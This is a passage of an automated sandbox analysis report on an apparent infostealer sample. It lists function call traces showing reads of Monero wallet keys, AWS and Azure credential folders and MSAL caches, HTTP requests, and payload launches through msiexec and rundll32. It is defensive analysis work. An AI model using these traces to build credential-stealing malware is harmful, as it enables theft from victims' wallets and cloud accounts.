                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • InternetCloseHandle.WININET(00000000), ref: 00B75FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 4a5c3e79459cef4a8d2bbff980e596593d9d0a9dd4d7d854369eac7a40590001
                                • Instruction ID: 8d047c34eab721c4d68e5a0f7199c35b8a796216d0b8fba1dbb1c8682e3e9e06
                                • Opcode Fuzzy Hash: 4a5c3e79459cef4a8d2bbff980e596593d9d0a9dd4d7d854369eac7a40590001
                                • Instruction Fuzzy Hash: 1C12DF71820118AAEB15FBA4DC95FEE73B8BF14700F5041EAF106721A1EF746A4ACF65
                                Function 00B7CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B7D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B7D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D208
                                • lstrcat.KERNEL32(?,00B91478), ref: 00B7D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D22A
                                • lstrcat.KERNEL32(?,00B9147C), ref: 00B7D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D24C
                                • lstrcat.KERNEL32(?,00B91480), ref: 00B7D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D26E
                                • lstrcat.KERNEL32(?,00B91484), ref: 00B7D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D290
                                • lstrcat.KERNEL32(?,00B91488), ref: 00B7D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D2B2
                                • lstrcat.KERNEL32(?,00B9148C), ref: 00B7D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D2D4
                                • lstrcat.KERNEL32(?,00B91490), ref: 00B7D2E3
                                  • Part of subcall function 00B8A820: lstrlen.KERNEL32(00B74F05,?,?,00B74F05,00B90DDE), ref: 00B8A82B
                                  • Part of subcall function 00B8A820: lstrcpy.KERNEL32(00B90DDE,00000000), ref: 00B8A885
                                • lstrlen.KERNEL32(?), ref: 00B7D32A
                                • lstrlen.KERNEL32(?), ref: 00B7D339
                                  • Part of subcall function 00B8AA70: StrCmpCA.SHLWAPI(009388C0,00B7A7A7,?,00B7A7A7,009388C0), ref: 00B8AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 3f96bc94210359e4bfd7836b80b7ce5e74da7ae62551814491dff1c03bd52643
                                • Instruction ID: b1749876ed92e290b1d9f0de36eab08696de527d759d941e90786baf04b86613
                                • Opcode Fuzzy Hash: 3f96bc94210359e4bfd7836b80b7ce5e74da7ae62551814491dff1c03bd52643
                                • Instruction Fuzzy Hash: 72E10F71910209EBDB04FBA4DD96EEE73B8BF14301F504199F106B61A1DE39AE05DB72
                                Function 00B7C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0093CEF8,00000000,?,00B9144C,00000000,?,?), ref: 00B7CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B7CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00B7CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B7CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B7CAD9
                                • StrStrA.SHLWAPI(?,0093CDF0,00B90B52), ref: 00B7CAF7
                                • StrStrA.SHLWAPI(00000000,0093CE08), ref: 00B7CB1E
                                • StrStrA.SHLWAPI(?,0093D538,00000000,?,00B91458,00000000,?,00000000,00000000,?,00938970,00000000,?,00B91454,00000000,?), ref: 00B7CCA2
                                • StrStrA.SHLWAPI(00000000,0093D698), ref: 00B7CCB9
                                  • Part of subcall function 00B7C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B7C871
                                  • Part of subcall function 00B7C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B7C87C
                                • StrStrA.SHLWAPI(?,0093D698,00000000,?,00B9145C,00000000,?,00000000,009388E0), ref: 00B7CD5A
                                • StrStrA.SHLWAPI(00000000,00938B40), ref: 00B7CD71
                                  • Part of subcall function 00B7C820: lstrcat.KERNEL32(?,00B90B46), ref: 00B7C943
                                  • Part of subcall function 00B7C820: lstrcat.KERNEL32(?,00B90B47), ref: 00B7C957
                                  • Part of subcall function 00B7C820: lstrcat.KERNEL32(?,00B90B4E), ref: 00B7C978
                                • lstrlen.KERNEL32(00000000), ref: 00B7CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00B7CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 3448e310df684da9d0314b0d93e8c9ee073bc7b7c74236d551412382c98ce824
                                • Instruction ID: 59bfc08ddc65bdae0d8f757abf1e86c7131376f12f82fb64dfe0ee7aaf87c0bd
                                • Opcode Fuzzy Hash: 3448e310df684da9d0314b0d93e8c9ee073bc7b7c74236d551412382c98ce824
                                • Instruction Fuzzy Hash: 1DE1B071910108EBEB15FBA4DC95FEEB7B8AF14300F50419AF506B61A1DF346A4ACB72
                                Function 00B88320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • RegOpenKeyExA.ADVAPI32(00000000,0093A9C0,00000000,00020019,00000000,00B905B6), ref: 00B883A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B88426
                                • wsprintfA.USER32 ref: 00B88459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B8847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B8848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B88499
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 76bf7847f6c2133a2fc0f9ec08ab9575c0ea6f4e60e2c1e0a82208a055bdb04c
                                • Instruction ID: b8e4557c8d23bf88733591e61731e2ad8beea4e7665e7fd6c48fcc3c01498ef5
                                • Opcode Fuzzy Hash: 76bf7847f6c2133a2fc0f9ec08ab9575c0ea6f4e60e2c1e0a82208a055bdb04c
                                • Instruction Fuzzy Hash: 8881E971910218EBEB24EB54CC95FEAB7B8FF48700F4082D9E109A6190DF756B85CFA5
                                Function 00B84D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00B84DCD
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B8492C
                                  • Part of subcall function 00B84910: FindFirstFileA.KERNEL32(?,?), ref: 00B84943
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00B84E59
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FDC), ref: 00B84971
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FE0), ref: 00B84987
                                  • Part of subcall function 00B84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B84B7D
                                  • Part of subcall function 00B84910: FindClose.KERNEL32(000000FF), ref: 00B84B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B84EE5
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B849B0
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B908D2), ref: 00B849C5
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B849E2
                                  • Part of subcall function 00B84910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B84A1E
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,0093E220), ref: 00B84A4A
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,00B90FF8), ref: 00B84A5C
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,?), ref: 00B84A70
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,00B90FFC), ref: 00B84A82
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,?), ref: 00B84A96
                                  • Part of subcall function 00B84910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B84AAC
                                  • Part of subcall function 00B84910: DeleteFileA.KERNEL32(?), ref: 00B84B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 18a0c18e9c0af9b25facd675e23abd6144033150cefe7b460d6a23b42ad6ae1e
                                • Instruction ID: efbb89f8228d5a743ce8cefa6ce146855d17129f9aa2dd586333714ddfc404ae
                                • Opcode Fuzzy Hash: 18a0c18e9c0af9b25facd675e23abd6144033150cefe7b460d6a23b42ad6ae1e
                                • Instruction Fuzzy Hash: DF41817A940304A7DB14F774EC47FDD32B8AB24700F4049E4B189A61D1EEB597C9DBA2
                                Function 00B89010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B8906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 3d55b6d7c4890995c8db1c1c854b7bafbe35527043837843d5643316e328c173
                                • Instruction ID: d2e2f4116cdfd421aa8644d00ab1846b390cc331e0902c7c984695dd652bb982
                                • Opcode Fuzzy Hash: 3d55b6d7c4890995c8db1c1c854b7bafbe35527043837843d5643316e328c173
                                • Instruction Fuzzy Hash: F871BAB5910208EBDB04EFE8DC89FEEB7B9AF48700F148658F515E7290DB74A905CB61
                                Function 00B82E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B831C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B8335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B834EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 68e54d02a9922b7f012766c4711e990a85408a79182fe1df2404d73e53734b70
                                • Instruction ID: 9319d15e527a5ba7e69214c1cc057fbca5edc0ab1b0a46d89af4f61b2aedfc80
                                • Opcode Fuzzy Hash: 68e54d02a9922b7f012766c4711e990a85408a79182fe1df2404d73e53734b70
                                • Instruction Fuzzy Hash: 9D12B1718101189AEB15FBA0DC92FDDB7B8AF14700F5041EAF506761A1EF786B4ACF62
                                Function 00B852C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B76280: InternetOpenA.WININET(00B90DFE,00000001,00000000,00000000,00000000), ref: 00B762E1
                                  • Part of subcall function 00B76280: StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76303
                                  • Part of subcall function 00B76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B76335
                                  • Part of subcall function 00B76280: HttpOpenRequestA.WININET(00000000,GET,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B76385
                                  • Part of subcall function 00B76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B763BF
                                  • Part of subcall function 00B76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B763D1
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85318
                                • lstrlen.KERNEL32(00000000), ref: 00B8532F
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00B85364
                                • lstrlen.KERNEL32(00000000), ref: 00B85383
                                • lstrlen.KERNEL32(00000000), ref: 00B853AE
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
